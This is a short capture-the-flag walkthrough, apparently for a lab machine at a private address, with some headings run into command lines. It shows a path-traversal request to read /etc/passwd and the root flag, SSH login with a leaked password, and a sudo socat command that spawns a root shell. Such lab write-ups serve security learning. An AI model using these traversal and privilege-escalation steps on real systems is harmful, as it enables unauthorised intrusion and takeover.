LFI
view-source:http://10.10.202.16/article?name=../../../../../../../etc/passwd
plaintext
...[snip]...
#falconfeast:rootpassword
...[snip]...
## USER
```bash
ssh falconfeast@10.10.202.16 <- rootpasswordROOT
bash
sudo -lShows socat can be execute as root
bash
sudo socat stdin exec:/bin/shNOTES
The web app is running as root.
So to get the root flag:
http://10.10.202.16/article?name=../../../../../../../root/root.txt